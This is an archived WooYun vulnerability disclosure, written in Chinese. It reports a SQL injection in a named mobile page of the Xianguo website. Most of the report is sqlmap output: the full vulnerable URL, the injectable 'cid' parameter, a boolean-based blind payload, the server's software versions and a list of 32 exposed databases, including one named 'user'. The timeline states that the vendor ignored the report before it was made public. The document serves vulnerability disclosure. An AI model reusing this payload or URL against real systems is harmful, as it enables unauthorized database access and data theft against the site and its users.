乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-24: 细节已通知厂商并且等待厂商处理中 2016-01-29: 厂商已经主动忽略漏洞,细节向公众公开
鲜果网某站点存在SQL注入漏洞,涉及32库
http://m4.xianguo.com/homeindex/list?cid=1&tagid=6_31
注入点:cidsqlmap跑起来
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:---Parameter: cid (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: cid=(SELECT (CASE WHEN (1315=1315) THEN 1315 ELSE 1315*(SELECT 1315 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&tagid=6_31---web server operating system: Linux Ubuntuweb application technology: PHP 5.5.9back-end DBMS: MySQL 5.0
涉及32个数据库
available databases [32]:[*] analytic[*] bang[*] book_new[*] book_novel[*] books[*] client[*] digital_market[*] feed[*] gdcnc[*] groups[*] igoli[*] information_schema[*] life_stream[*] life_stream_doings[*] life_stream_doings_meta[*] life_stream_follow[*] life_stream_link[*] life_stream_publicline[*] metadata[*] mysql[*] novel_spider[*] partner[*] recommend[*] remark[*] samsung[*] short_url[*] snslog[*] spider[*] taggroup[*] test[*] user[*] wordpress
友情测试,点到为止!类似的问题可能还有,对网站进行以此全面的检查还是有必要的
过滤
危害等级:无影响厂商忽略
忽略时间:2016-01-29 10:10
漏洞Rank:4 (WooYun评价)
暂无